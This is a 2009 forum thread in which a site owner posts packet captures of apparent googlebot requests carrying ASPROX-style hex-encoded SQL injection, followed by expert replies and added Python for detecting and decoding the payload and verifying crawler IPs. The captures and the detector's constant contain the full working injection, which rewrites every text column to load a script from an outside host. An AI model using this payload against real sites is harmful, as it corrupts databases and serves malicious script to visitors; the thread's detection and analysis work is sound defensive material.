Solved

Google used as a hacking tool - inadvertently attacking my site

Posted on 2009-05-19
8
426 Views
Last Modified: 2013-11-29
Google is somehow being used or manipulated to attack our website.  We have an IPS that records all attack traffic.  At least 500 times a day, googlebot attempts to hit a few sites in our facility with SQL injection such as ASPROX.  Because our IPS blocks the traffic, googlebot is never able to index the pages.  The site itself is not compromised in any way and we cannot seem to determine why Google is trying to do this.  Because googlebot's traffic is being blocked, it is continuing to hit the site relentlessly.

Some packet captures are below


Frame 1 (1484 bytes on wire, 1484 bytes captured)

    Arrival Time: May 19, 2009 04:16:02.248079000

    Time delta from previous packet: 0.000000000 seconds

    Time since reference or first frame: 0.000000000 seconds

    Frame Number: 1

    Packet Length: 1484 bytes

    Capture Length: 1484 bytes

    Protocols in frame: eth:ip:tcp:http

Ethernet II, Src: Cisco_3d:9c:1b (00:03:6c:3d:9c:1b), Dst: 00:1f:9d:81:0c:00 (00:1f:9d:81:0c:00)

    Destination: 00:1f:9d:81:0c:00 (00:1f:9d:81:0c:00)

    Source: Cisco_3d:9c:1b (00:03:6c:3d:9c:1b)

    Type: IP (0x0800)

Internet Protocol, Src: crawl-66-249-65-18.googlebot.com (66.249.65.18), Dst: www.coolabah.com (69.63.131.110)

    Version: 4

    Header length: 20 bytes

    Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00)

        0000 00.. = Differentiated Services Codepoint: Default (0x00)

        .... ..0. = ECN-Capable Transport (ECT): 0

        .... ...0 = ECN-CE: 0

    Total Length: 1470

    Identification: 0xeb57 (60247)

    Flags: 0x04 (Don't Fragment)

        0... = Reserved bit: Not set

        .1.. = Don't fragment: Set

        ..0. = More fragments: Not set

    Fragment offset: 0

    Time to live: 56

    Protocol: TCP (0x06)

    Header checksum: 0x052a [correct]

        Good: True

        Bad : False

    Source: crawl-66-249-65-18.googlebot.com (66.249.65.18)

    Destination: www.coolabah.com (69.63.131.110)

Transmission Control Protocol, Src Port: 41347 (41347), Dst Port: http (80), Seq: 0, Ack: 0, Len: 1418

    Source port: 41347 (41347)

    Destination port: http (80)

    Sequence number: 0    (relative sequence number)

    Next sequence number: 1418    (relative sequence number)

    Acknowledgement number: 0    (relative ack number)

    Header length: 32 bytes

    Flags: 0x0010 (ACK)

        0... .... = Congestion Window Reduced (CWR): Not set

        .0.. .... = ECN-Echo: Not set

        ..0. .... = Urgent: Not set

        ...1 .... = Acknowledgment: Set

        .... 0... = Push: Not set

        .... .0.. = Reset: Not set

        .... ..0. = Syn: Not set

        .... ...0 = Fin: Not set

    Window size: 90

    Checksum: 0x9fda [correct]

    Options: (12 bytes)

        NOP

        NOP

        Time stamp: tsval 121714743, tsecr 0

    TCP segment data (1418 bytes)
 

0000  00 1f 9d 81 0c 00 00 03 6c 3d 9c 1b 08 00 45 00   ........l=....E.

0010  05 be eb 57 40 00 38 06 05 2a 42 f9 41 12 45 3f   ...W@.8..*B.A.E?

0020  83 6e a1 83 00 50 ce cb d3 62 d5 94 b0 51 80 10   .n...P...b...Q..

0030  00 5a 9f da 00 00 01 01 08 0a 07 41 38 37 00 00   .Z.........A87..

0040  00 00 47 45 54 20 2f 73 70 6f 72 74 2f 6d 61 67   ..GET /sport/mag

0050  70 69 65 73 2e 63 66 6d 3f 3b 44 45 43 4c 41 52   pies.cfm?;DECLAR

0060  45 25 32 30 40 53 25 32 30 43 48 41 52 28 34 30   E%20@S%20CHAR(40

0070  30 30 29 3b 53 45 54 25 32 30 40 53 3d 43 41 53   00);SET%20@S=CAS

0080  54 28 30 78 34 34 34 35 34 33 34 43 34 31 35 32   T(0x4445434C4152

0090  34 35 32 30 34 30 35 34 32 30 37 36 36 31 37 32   4520405420766172

00a0  36 33 36 38 36 31 37 32 32 38 33 32 33 35 33 35   6368617228323535

00b0  32 39 32 43 34 30 34 33 32 30 37 36 36 31 37 32   292C404320766172

00c0  36 33 36 38 36 31 37 32 32 38 33 34 33 30 33 30   6368617228343030

00d0  33 30 32 39 32 30 34 34 34 35 34 33 34 43 34 31   3029204445434C41

00e0  35 32 34 35 32 30 35 34 36 31 36 32 36 43 36 35   5245205461626C65

00f0  35 46 34 33 37 35 37 32 37 33 36 46 37 32 32 30   5F437572736F7220

0100  34 33 35 35 35 32 35 33 34 46 35 32 32 30 34 36   435552534F522046

0110  34 46 35 32 32 30 37 33 36 35 36 43 36 35 36 33   4F522073656C6563

0120  37 34 32 30 36 31 32 45 36 45 36 31 36 44 36 35   7420612E6E616D65

0130  32 43 36 32 32 45 36 45 36 31 36 44 36 35 32 30   2C622E6E616D6520

0140  36 36 37 32 36 46 36 44 32 30 37 33 37 39 37 33   66726F6D20737973

0150  36 46 36 32 36 41 36 35 36 33 37 34 37 33 32 30   6F626A6563747320

0160  36 31 32 43 37 33 37 39 37 33 36 33 36 46 36 43   612C737973636F6C

0170  37 35 36 44 36 45 37 33 32 30 36 32 32 30 37 37   756D6E7320622077

0180  36 38 36 35 37 32 36 35 32 30 36 31 32 45 36 39   6865726520612E69

0190  36 34 33 44 36 32 32 45 36 39 36 34 32 30 36 31   643D622E69642061

01a0  36 45 36 34 32 30 36 31 32 45 37 38 37 34 37 39   6E6420612E787479

01b0  37 30 36 35 33 44 32 37 37 35 32 37 32 30 36 31   70653D2775272061

01c0  36 45 36 34 32 30 32 38 36 32 32 45 37 38 37 34   6E642028622E7874

01d0  37 39 37 30 36 35 33 44 33 39 33 39 32 30 36 46   7970653D3939206F

01e0  37 32 32 30 36 32 32 45 37 38 37 34 37 39 37 30   7220622E78747970

01f0  36 35 33 44 33 33 33 35 32 30 36 46 37 32 32 30   653D3335206F7220

0200  36 32 32 45 37 38 37 34 37 39 37 30 36 35 33 44   622E78747970653D

0210  33 32 33 33 33 31 32 30 36 46 37 32 32 30 36 32   323331206F722062

0220  32 45 37 38 37 34 37 39 37 30 36 35 33 44 33 31   2E78747970653D31

0230  33 36 33 37 32 39 32 30 34 46 35 30 34 35 34 45   363729204F50454E

0240  32 30 35 34 36 31 36 32 36 43 36 35 35 46 34 33   205461626C655F43

0250  37 35 37 32 37 33 36 46 37 32 32 30 34 36 34 35   7572736F72204645

0260  35 34 34 33 34 38 32 30 34 45 34 35 35 38 35 34   544348204E455854

0270  32 30 34 36 35 32 34 46 34 44 32 30 32 30 35 34   2046524F4D202054

0280  36 31 36 32 36 43 36 35 35 46 34 33 37 35 37 32   61626C655F437572

0290  37 33 36 46 37 32 32 30 34 39 34 45 35 34 34 46   736F7220494E544F

02a0  32 30 34 30 35 34 32 43 34 30 34 33 32 30 35 37   2040542C40432057

02b0  34 38 34 39 34 43 34 35 32 38 34 30 34 30 34 36   48494C4528404046

02c0  34 35 35 34 34 33 34 38 35 46 35 33 35 34 34 31   455443485F535441

02d0  35 34 35 35 35 33 33 44 33 30 32 39 32 30 34 32   5455533D30292042

02e0  34 35 34 37 34 39 34 45 32 30 36 35 37 38 36 35   4547494E20657865

02f0  36 33 32 38 32 37 37 35 37 30 36 34 36 31 37 34   6328277570646174

0300  36 35 32 30 35 42 32 37 32 42 34 30 35 34 32 42   65205B272B40542B

0310  32 37 35 44 32 30 37 33 36 35 37 34 32 30 35 42   275D20736574205B

0320  32 37 32 42 34 30 34 33 32 42 32 37 35 44 33 44   272B40432B275D3D

0330  32 37 32 37 32 32 33 45 33 43 32 46 37 34 36 39   2727223E3C2F7469

0340  37 34 36 43 36 35 33 45 33 43 37 33 36 33 37 32   746C653E3C736372

0350  36 39 37 30 37 34 32 30 37 33 37 32 36 33 33 44   697074207372633D

0360  32 32 36 38 37 34 37 34 37 30 33 41 32 46 32 46   22687474703A2F2F

0370  37 37 37 37 37 37 33 33 32 45 37 33 37 33 33 31   777777332E737331

0380  33 31 37 31 36 45 32 45 36 33 36 45 32 46 36 33   31716E2E636E2F63

0390  37 33 37 32 37 33 37 33 32 46 37 37 32 45 36 41   737273732F772E6A

03a0  37 33 32 32 33 45 33 43 32 46 37 33 36 33 37 32   73223E3C2F736372

03b0  36 39 37 30 37 34 33 45 33 43 32 31 32 44 32 44   6970743E3C212D2D

03c0  32 37 32 37 32 42 35 42 32 37 32 42 34 30 34 33   27272B5B272B4043

03d0  32 42 32 37 35 44 32 30 37 37 36 38 36 35 37 32   2B275D2077686572

03e0  36 35 32 30 32 37 32 42 34 30 34 33 32 42 32 37   6520272B40432B27

03f0  32 30 36 45 36 46 37 34 32 30 36 43 36 39 36 42   206E6F74206C696B

0400  36 35 32 30 32 37 32 37 32 35 32 32 33 45 33 43   6520272725223E3C

0410  32 46 37 34 36 39 37 34 36 43 36 35 33 45 33 43   2F7469746C653E3C

0420  37 33 36 33 37 32 36 39 37 30 37 34 32 30 37 33   7363726970742073

0430  37 32 36 33 33 44 32 32 36 38 37 34 37 34 37 30   72633D2268747470

0440  33 41 32 46 32 46 37 37 37 37 37 37 33 33 32 45   3A2F2F777777332E

0450  37 33 37 33 33 31 33 31 37 31 36 45 32 45 36 33   73733131716E2E63

0460  36 45 32 46 36 33 37 33 37 32 37 33 37 33 32 46   6E2F63737273732F

0470  37 37 32 45 36 41 37 33 32 32 33 45 33 43 32 46   772E6A73223E3C2F

0480  37 33 36 33 37 32 36 39 37 30 37 34 33 45 33 43   7363726970743E3C

0490  32 31 32 44 32 44 32 37 32 37 32 37 32 39 34 36   212D2D2727272946

04a0  34 35 35 34 34 33 34 38 32 30 34 45 34 35 35 38   45544348204E4558

04b0  35 34 32 30 34 36 35 32 34 46 34 44 32 30 32 30   542046524F4D2020

04c0  35 34 36 31 36 32 36 43 36 35 35 46 34 33 37 35   5461626C655F4375

04d0  37 32 37 33 36 46 37 32 32 30 34 39 34 45 35 34   72736F7220494E54

04e0  34 46 32 30 34 30 35 34 32 43 34 30 34 33 32 30   4F2040542C404320

04f0  34 35 34 45 34 34 32 30 34 33 34 43 34 46 35 33   454E4420434C4F53

0500  34 35 32 30 35 34 36 31 36 32 36 43 36 35 35 46   45205461626C655F

0510  34 33 37 35 37 32 37 33 36 46 37 32 32 30 34 34   437572736F722044

0520  34 35 34 31 34 43 34 43 34 46 34 33 34 31 35 34   45414C4C4F434154

0530  34 35 32 30 35 34 36 31 36 32 36 43 36 35 35 46   45205461626C655F

0540  34 33 37 35 37 32 37 33 36 46 37 32 25 32 30 41   437572736F72%20A

0550  53 25 32 30 43 48 41 52 28 34 30 30 30 29 29 3b   S%20CHAR(4000));

0560  45 58 45 43 28 40 53 29 3b 20 48 54 54 50 2f 31   EXEC(@S); HTTP/1

0570  2e 31 0d 0a 48 6f 73 74 3a 20 77 77 77 2e 63 6f   .1..Host: www.co

0580  6f 6c 61 62 61 68 2e 63 6f 6d 0d 0a 43 6f 6e 6e   olabah.com..Conn

0590  65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 61 6c 69   ection: Keep-ali

05a0  76 65 0d 0a 41 63 63 65 70 74 3a 20 2a 2f 2a 0d   ve..Accept: */*.

05b0  0a 46 72 6f 6d 3a 20 67 6f 6f 67 6c 65 62 6f 74   .From: googlebot

05c0  28 61 74 29 67 6f 6f 67 6c 65 62 6f               (at)googlebo
 

-----------------------------------------------------------------------------------------------------

Frame 1 (1484 bytes on wire, 1484 bytes captured)

    Arrival Time: May 19, 2009 04:08:20.781412000

    Time delta from previous packet: 0.000000000 seconds

    Time since reference or first frame: 0.000000000 seconds

    Frame Number: 1

    Packet Length: 1484 bytes

    Capture Length: 1484 bytes

    Protocols in frame: eth:ip:tcp:http

Ethernet II, Src: Cisco_3d:9c:1b (00:03:6c:3d:9c:1b), Dst: 00:1f:9d:81:0c:00 (00:1f:9d:81:0c:00)

    Destination: 00:1f:9d:81:0c:00 (00:1f:9d:81:0c:00)

    Source: Cisco_3d:9c:1b (00:03:6c:3d:9c:1b)

    Type: IP (0x0800)

Internet Protocol, Src: crawl-66-249-71-152.googlebot.com (66.249.71.152), Dst: 69.63.131.111 (69.63.131.111)

    Version: 4

    Header length: 20 bytes

    Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00)

        0000 00.. = Differentiated Services Codepoint: Default (0x00)

        .... ..0. = ECN-Capable Transport (ECT): 0

        .... ...0 = ECN-CE: 0

    Total Length: 1470

    Identification: 0xb69e (46750)

    Flags: 0x04 (Don't Fragment)

        0... = Reserved bit: Not set

        .1.. = Don't fragment: Set

        ..0. = More fragments: Not set

    Fragment offset: 0

    Time to live: 57

    Protocol: TCP (0x06)

    Header checksum: 0x325c [correct]

        Good: True

        Bad : False

    Source: crawl-66-249-71-152.googlebot.com (66.249.71.152)

    Destination: 69.63.131.111 (69.63.131.111)

Transmission Control Protocol, Src Port: 33193 (33193), Dst Port: http (80), Seq: 0, Ack: 0, Len: 1418

    Source port: 33193 (33193)

    Destination port: http (80)

    Sequence number: 0    (relative sequence number)

    Next sequence number: 1418    (relative sequence number)

    Acknowledgement number: 0    (relative ack number)

    Header length: 32 bytes

    Flags: 0x0010 (ACK)

        0... .... = Congestion Window Reduced (CWR): Not set

        .0.. .... = ECN-Echo: Not set

        ..0. .... = Urgent: Not set

        ...1 .... = Acknowledgment: Set

        .... 0... = Push: Not set

        .... .0.. = Reset: Not set

        .... ..0. = Syn: Not set

        .... ...0 = Fin: Not set

    Window size: 92

    Checksum: 0x6bf1 [correct]

    Options: (12 bytes)

        NOP

        NOP

        Time stamp: tsval 3656893948, tsecr 0

    TCP segment data (1418 bytes)
 

0000  00 1f 9d 81 0c 00 00 03 6c 3d 9c 1b 08 00 45 00   ........l=....E.

0010  05 be b6 9e 40 00 39 06 32 5c 42 f9 47 98 45 3f   ....@.9.2\B.G.E?

0020  83 6f 81 a9 00 50 de ea 73 7b 98 49 41 46 80 10   .o...P..s{.IAF..

0030  00 5c 6b f1 00 00 01 01 08 0a d9 f7 c5 fc 00 00   .\k.............

0040  00 00 47 45 54 20 2f 73 74 6f 72 79 31 31 38 2e   ..GET /story118.

0050  63 66 6d 3f 27 3b 44 45 43 4c 41 52 45 25 32 30   cfm?';DECLARE%20

0060  40 53 25 32 30 43 48 41 52 28 34 30 30 30 29 3b   @S%20CHAR(4000);

0070  53 45 54 25 32 30 40 53 3d 43 41 53 54 28 30 78   SET%20@S=CAST(0x

0080  34 34 34 35 34 33 34 43 34 31 35 32 34 35 32 30   4445434C41524520

0090  34 30 35 34 32 30 37 36 36 31 37 32 36 33 36 38   4054207661726368

00a0  36 31 37 32 32 38 33 32 33 35 33 35 32 39 32 43   617228323535292C

00b0  34 30 34 33 32 30 37 36 36 31 37 32 36 33 36 38   4043207661726368

00c0  36 31 37 32 32 38 33 34 33 30 33 30 33 30 32 39   6172283430303029

00d0  32 30 34 34 34 35 34 33 34 43 34 31 35 32 34 35   204445434C415245

00e0  32 30 35 34 36 31 36 32 36 43 36 35 35 46 34 33   205461626C655F43

00f0  37 35 37 32 37 33 36 46 37 32 32 30 34 33 35 35   7572736F72204355

0100  35 32 35 33 34 46 35 32 32 30 34 36 34 46 35 32   52534F5220464F52

0110  32 30 37 33 36 35 36 43 36 35 36 33 37 34 32 30   2073656C65637420

0120  36 31 32 45 36 45 36 31 36 44 36 35 32 43 36 32   612E6E616D652C62

0130  32 45 36 45 36 31 36 44 36 35 32 30 36 36 37 32   2E6E616D65206672

0140  36 46 36 44 32 30 37 33 37 39 37 33 36 46 36 32   6F6D207379736F62

0150  36 41 36 35 36 33 37 34 37 33 32 30 36 31 32 43   6A6563747320612C

0160  37 33 37 39 37 33 36 33 36 46 36 43 37 35 36 44   737973636F6C756D

0170  36 45 37 33 32 30 36 32 32 30 37 37 36 38 36 35   6E73206220776865

0180  37 32 36 35 32 30 36 31 32 45 36 39 36 34 33 44   726520612E69643D

0190  36 32 32 45 36 39 36 34 32 30 36 31 36 45 36 34   622E696420616E64

01a0  32 30 36 31 32 45 37 38 37 34 37 39 37 30 36 35   20612E7874797065

01b0  33 44 32 37 37 35 32 37 32 30 36 31 36 45 36 34   3D27752720616E64

01c0  32 30 32 38 36 32 32 45 37 38 37 34 37 39 37 30   2028622E78747970

01d0  36 35 33 44 33 39 33 39 32 30 36 46 37 32 32 30   653D3939206F7220

01e0  36 32 32 45 37 38 37 34 37 39 37 30 36 35 33 44   622E78747970653D

01f0  33 33 33 35 32 30 36 46 37 32 32 30 36 32 32 45   3335206F7220622E

0200  37 38 37 34 37 39 37 30 36 35 33 44 33 32 33 33   78747970653D3233

0210  33 31 32 30 36 46 37 32 32 30 36 32 32 45 37 38   31206F7220622E78

0220  37 34 37 39 37 30 36 35 33 44 33 31 33 36 33 37   747970653D313637

0230  32 39 32 30 34 46 35 30 34 35 34 45 32 30 35 34   29204F50454E2054

0240  36 31 36 32 36 43 36 35 35 46 34 33 37 35 37 32   61626C655F437572

0250  37 33 36 46 37 32 32 30 34 36 34 35 35 34 34 33   736F722046455443

0260  34 38 32 30 34 45 34 35 35 38 35 34 32 30 34 36   48204E4558542046

0270  35 32 34 46 34 44 32 30 32 30 35 34 36 31 36 32   524F4D2020546162

0280  36 43 36 35 35 46 34 33 37 35 37 32 37 33 36 46   6C655F437572736F

0290  37 32 32 30 34 39 34 45 35 34 34 46 32 30 34 30   7220494E544F2040

02a0  35 34 32 43 34 30 34 33 32 30 35 37 34 38 34 39   542C404320574849

02b0  34 43 34 35 32 38 34 30 34 30 34 36 34 35 35 34   4C45284040464554

02c0  34 33 34 38 35 46 35 33 35 34 34 31 35 34 35 35   43485F5354415455

02d0  35 33 33 44 33 30 32 39 32 30 34 32 34 35 34 37   533D302920424547

02e0  34 39 34 45 32 30 36 35 37 38 36 35 36 33 32 38   494E206578656328

02f0  32 37 37 35 37 30 36 34 36 31 37 34 36 35 32 30   2775706461746520

0300  35 42 32 37 32 42 34 30 35 34 32 42 32 37 35 44   5B272B40542B275D

0310  32 30 37 33 36 35 37 34 32 30 35 42 32 37 32 42   20736574205B272B

0320  34 30 34 33 32 42 32 37 35 44 33 44 32 37 32 37   40432B275D3D2727

0330  32 32 33 45 33 43 32 46 37 34 36 39 37 34 36 43   223E3C2F7469746C

0340  36 35 33 45 33 43 37 33 36 33 37 32 36 39 37 30   653E3C7363726970

0350  37 34 32 30 37 33 37 32 36 33 33 44 32 32 36 38   74207372633D2268

0360  37 34 37 34 37 30 33 41 32 46 32 46 37 37 37 37   7474703A2F2F7777

0370  37 37 33 33 32 45 37 33 37 33 33 31 33 31 37 31   77332E7373313171

0380  36 45 32 45 36 33 36 45 32 46 36 33 37 33 37 32   6E2E636E2F637372

0390  37 33 37 33 32 46 37 37 32 45 36 41 37 33 32 32   73732F772E6A7322

03a0  33 45 33 43 32 46 37 33 36 33 37 32 36 39 37 30   3E3C2F7363726970

03b0  37 34 33 45 33 43 32 31 32 44 32 44 32 37 32 37   743E3C212D2D2727

03c0  32 42 35 42 32 37 32 42 34 30 34 33 32 42 32 37   2B5B272B40432B27

03d0  35 44 32 30 37 37 36 38 36 35 37 32 36 35 32 30   5D20776865726520

03e0  32 37 32 42 34 30 34 33 32 42 32 37 32 30 36 45   272B40432B27206E

03f0  36 46 37 34 32 30 36 43 36 39 36 42 36 35 32 30   6F74206C696B6520

0400  32 37 32 37 32 35 32 32 33 45 33 43 32 46 37 34   272725223E3C2F74

0410  36 39 37 34 36 43 36 35 33 45 33 43 37 33 36 33   69746C653E3C7363

0420  37 32 36 39 37 30 37 34 32 30 37 33 37 32 36 33   7269707420737263

0430  33 44 32 32 36 38 37 34 37 34 37 30 33 41 32 46   3D22687474703A2F

0440  32 46 37 37 37 37 37 37 33 33 32 45 37 33 37 33   2F777777332E7373

0450  33 31 33 31 37 31 36 45 32 45 36 33 36 45 32 46   3131716E2E636E2F

0460  36 33 37 33 37 32 37 33 37 33 32 46 37 37 32 45   63737273732F772E

0470  36 41 37 33 32 32 33 45 33 43 32 46 37 33 36 33   6A73223E3C2F7363

0480  37 32 36 39 37 30 37 34 33 45 33 43 32 31 32 44   726970743E3C212D

0490  32 44 32 37 32 37 32 37 32 39 34 36 34 35 35 34   2D27272729464554

04a0  34 33 34 38 32 30 34 45 34 35 35 38 35 34 32 30   4348204E45585420

04b0  34 36 35 32 34 46 34 44 32 30 32 30 35 34 36 31   46524F4D20205461

04c0  36 32 36 43 36 35 35 46 34 33 37 35 37 32 37 33   626C655F43757273

04d0  36 46 37 32 32 30 34 39 34 45 35 34 34 46 32 30   6F7220494E544F20

04e0  34 30 35 34 32 43 34 30 34 33 32 30 34 35 34 45   40542C404320454E

04f0  34 34 32 30 34 33 34 43 34 46 35 33 34 35 32 30   4420434C4F534520

0500  35 34 36 31 36 32 36 43 36 35 35 46 34 33 37 35   5461626C655F4375

0510  37 32 37 33 36 46 37 32 32 30 34 34 34 35 34 31   72736F7220444541

0520  34 43 34 43 34 46 34 33 34 31 35 34 34 35 32 30   4C4C4F4341544520

0530  35 34 36 31 36 32 36 43 36 35 35 46 34 33 37 35   5461626C655F4375

0540  37 32 37 33 36 46 37 32 25 32 30 41 53 25 32 30   72736F72%20AS%20

0550  43 48 41 52 28 34 30 30 30 29 29 3b 45 58 45 43   CHAR(4000));EXEC

0560  28 40 53 29 3b 20 48 54 54 50 2f 31 2e 31 0d 0a   (@S); HTTP/1.1..

0570  48 6f 73 74 3a 20 77 77 77 2e 6c 65 74 74 65 72   Host: www.letter

0580  66 72 6f 6d 6e 65 77 79 6f 72 6b 2e 63 6f 6d 0d   fromnewyork.com.

0590  0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65   .Connection: Kee

05a0  70 2d 61 6c 69 76 65 0d 0a 41 63 63 65 70 74 3a   p-alive..Accept:

05b0  20 2a 2f 2a 0d 0a 46 72 6f 6d 3a 20 67 6f 6f 67    */*..From: goog

05c0  6c 65 62 6f 74 28 61 74 29 67 6f 6f               lebot(at)goo


Question by:vladfriedman
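The two captures above carry the same request shape: a `DECLARE @S CHAR(4000); SET @S=CAST(0x... AS CHAR(4000)); EXEC(@S);` string appended to a `.cfm` URL, with the real T-SQL hidden inside the hex literal. A defender looking at IPS or web-server logs wants two things from such a request: a reliable signature for the shape, and the decoded statement so the actual effect on the database (which catalog tables it walks, which columns it rewrites, which host the injected script points at) is known. The following Python is an added example, not code from the thread or from any IPS product. The hex literal is the payload as printed in the ASCII column of the second capture; the second and third request lines are constructed benign requests to show the detector does not fire on normal traffic.

```python
"""Detect and decode ASPROX-style hex-encoded SQL injection in HTTP request lines."""
import re
from urllib.parse import unquote

# Payload bytes as printed in the ASCII column of the second capture on this page.
CAPTURED_HEX = "".join("""
4445434C41524520 4054207661726368 617228323535292C 4043207661726368
6172283430303029 204445434C415245 205461626C655F43 7572736F72204355
52534F5220464F52 2073656C65637420 612E6E616D652C62 2E6E616D65206672
6F6D207379736F62 6A6563747320612C 737973636F6C756D 6E73206220776865
726520612E69643D 622E696420616E64 20612E7874797065 3D27752720616E64
2028622E78747970 653D3939206F7220 622E78747970653D 3335206F7220622E
78747970653D3233 31206F7220622E78 747970653D313637 29204F50454E2054
61626C655F437572 736F722046455443 48204E4558542046 524F4D2020546162
6C655F437572736F 7220494E544F2040 542C404320574849 4C45284040464554
43485F5354415455 533D302920424547 494E206578656328 2775706461746520
5B272B40542B275D 20736574205B272B 40432B275D3D2727 223E3C2F7469746C
653E3C7363726970 74207372633D2268 7474703A2F2F7777 77332E7373313171
6E2E636E2F637372 73732F772E6A7322 3E3C2F7363726970 743E3C212D2D2727
2B5B272B40432B27 5D20776865726520 272B40432B27206E 6F74206C696B6520
272725223E3C2F74 69746C653E3C7363 7269707420737263 3D22687474703A2F
2F777777332E7373 3131716E2E636E2F 63737273732F772E 6A73223E3C2F7363
726970743E3C212D 2D27272729464554 4348204E45585420 46524F4D20205461
626C655F43757273 6F7220494E544F20 40542C404320454E 4420434C4F534520
5461626C655F4375 72736F7220444541 4C4C4F4341544520 5461626C655F4375
72736F72
""".split())

# Constructed sample request lines: the first is rebuilt from the capture above,
# the other two are ordinary requests that must not be flagged.
SAMPLE_REQUESTS = [
    "GET /story118.cfm?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x"
    + CAPTURED_HEX + "%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1",
    "GET /story118.cfm?id=118 HTTP/1.1",
    "GET /sport/magpies.cfm?season=2009&team=magpies HTTP/1.1",
]

# The ASPROX shape: declare a (var)char variable, SET it to CAST(0x<hex> AS ...),
# then EXEC it. The back-reference ties all three uses to the same variable name.
ASPROX_RE = re.compile(
    r"DECLARE\s+@(?P<var>\w+)\s+N?(?:VAR)?CHAR\(\d+\)\s*;\s*"
    r"SET\s+@(?P=var)\s*=\s*CAST\(0x(?P<hex>[0-9A-Fa-f]+)\s+AS\s+N?(?:VAR)?CHAR\(\d+\)\)\s*;\s*"
    r"EXEC\(@(?P=var)\)",
    re.IGNORECASE,
)


def decode_request_line(line):
    """Return the URL-decoded request target ("GET <target> HTTP/1.1")."""
    parts = line.split(" ")
    return unquote(parts[1]) if len(parts) >= 2 else unquote(line)


def find_hex_injection(line):
    """Return the SQL hidden in the hex literal, or None when the request
    does not match the ASPROX shape."""
    match = ASPROX_RE.search(decode_request_line(line))
    if not match:
        return None
    return bytes.fromhex(match.group("hex")).decode("ascii", errors="replace")


def summarize(sql):
    """Extract what a defender needs from the decoded statement."""
    return {
        # walks the catalog to find every text column of every user table
        "touches_catalog": "sysobjects" in sql and "syscolumns" in sql,
        # issues a dynamic UPDATE against each such column
        "rewrites_text_columns": bool(re.search(r"update\s+\[", sql, re.IGNORECASE)),
        # external hosts named in the injected markup (block / hunt for these)
        "injected_script_hosts": sorted(set(re.findall(r"https?://([^/\"'\s]+)", sql))),
    }


def scan(lines):
    """Run the detector over request lines; returns [(index, summary), ...]."""
    hits = []
    for i, line in enumerate(lines):
        sql = find_hex_injection(line)
        if sql is not None:
            hits.append((i, summarize(sql)))
    return hits


if __name__ == "__main__":
    for idx, info in scan(SAMPLE_REQUESTS):
        print("request %d flagged: %s" % (idx, info))
    print(find_hex_injection(SAMPLE_REQUESTS[0]))
```

The decoded statement is a cursor over `sysobjects`/`syscolumns` that appends a `<script src=...>` tag to every text-typed column of every user table, which is why the page notes the target sites run ColdFusion against SQL Server: the payload only does anything when the query string reaches an unparameterised T-SQL statement. The `injected_script_hosts` list is the practical hunting key: any row in your database containing that host name means the injection succeeded at some point.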
8 Comments
 
LVL 108

Expert Comment

by:Ray Paseur
ID: 24426785
Bring this to the attention of Chris Shiflett, here: http://shiflett.org/

I am sure he will be interested and may have seen something similar that can help you out.

Best regards, ~Ray
 
LVL 38

Expert Comment

by:Rich Rumble
ID: 24479910
It seems unlikely it's really a google-bot... the traffic/IP can be spoofed, the attack could be real, it's just that the attacker is hiding their packets by using a google-bot IP. Google-bot doesn't spend much time re-trying anything; that is what tells me that it's not really google, they move on quite quickly and typically only follow links and look for robots.txt.
Google-bot first tries to find a robots.txt file; it tries in each directory it makes it into. I've looked in my apache logs after being crawled and there are plenty of 404's for the google-bot.
http://www.google.com/support/webmasters/bin/answer.py?hl=en&answer=40364
-rich
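The spoofing question raised in this comment has a concrete test: the PTR name of the source address should sit under `googlebot.com` or `google.com`, and that name must resolve forward to the same address, otherwise anyone who controls reverse DNS for their own range can make their IP look like `crawl-66-249-65-18.googlebot.com`. The following Python is an added example, not code from the thread or from Google. The PTR name for 66.249.65.18 is taken from the capture; the forward-resolution table and the other two addresses are constructed for an offline demonstration, and live checks fall back to the system resolver.

```python
"""Forward-confirmed reverse DNS check for addresses claiming to be Googlebot."""
import socket

# Domains Google documents for its crawler reverse names.
CRAWLER_SUFFIXES = ("googlebot.com", "google.com")


def default_reverse(ip):
    """PTR lookup via the system resolver; None when there is no record."""
    try:
        return socket.gethostbyaddr(ip)[0]
    except (socket.herror, socket.gaierror, OSError):
        return None


def default_forward(hostname):
    """A-record lookup via the system resolver; empty set on failure."""
    try:
        return {info[4][0] for info in socket.getaddrinfo(hostname, None, socket.AF_INET)}
    except (socket.gaierror, OSError):
        return set()


def in_crawler_domain(hostname):
    """True when hostname is one of, or a subdomain of, the crawler suffixes."""
    h = hostname.rstrip(".").lower()
    return any(h == s or h.endswith("." + s) for s in CRAWLER_SUFFIXES)


def verify_crawler(ip, reverse=default_reverse, forward=default_forward):
    """Return (verdict, reason). The verdict is True only when the PTR name is
    in a crawler domain AND that name resolves back to the same address."""
    name = reverse(ip)
    if not name:
        return False, "no PTR record"
    if not in_crawler_domain(name):
        return False, "PTR %s not in crawler domain" % name
    if ip not in forward(name):
        return False, "forward lookup of %s does not return %s" % (name, ip)
    return True, "verified as %s" % name


# Constructed resolver tables so the check runs offline. Only the first PTR
# name comes from the capture; everything else is made up for illustration.
FAKE_PTR = {
    "66.249.65.18": "crawl-66-249-65-18.googlebot.com",  # seen in the capture
    "203.0.113.7": "crawl-66-249-65-18.googlebot.com",   # spoofed PTR, constructed
    "198.51.100.9": "host9.example.net",                 # ordinary host, constructed
}
FAKE_A = {
    "crawl-66-249-65-18.googlebot.com": {"66.249.65.18"},  # assumed forward record
    "host9.example.net": {"198.51.100.9"},
}


def verify_offline(ip):
    """Same check as verify_crawler, driven by the constructed tables above."""
    return verify_crawler(
        ip,
        reverse=lambda addr: FAKE_PTR.get(addr),
        forward=lambda name: FAKE_A.get(name, set()),
    )


if __name__ == "__main__":
    for addr in list(FAKE_PTR) + ["192.0.2.1"]:
        print(addr, verify_offline(addr))
```

Running `verify_crawler("66.249.65.18")` with the default resolvers performs the live check; the offline variant shows the three failure modes a log-review script must distinguish (no PTR, PTR outside the crawler domain, PTR that does not resolve back). Note that this only establishes who owns the address, not why the crawler issued the request; the thread's later comments cover that separately.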
 

Expert Comment

by:gdi67
ID: 24489578
I agree with richrumble. There are some tools which use Google to crawl your website.
 

Author Comment

by:vladfriedman
ID: 24489630
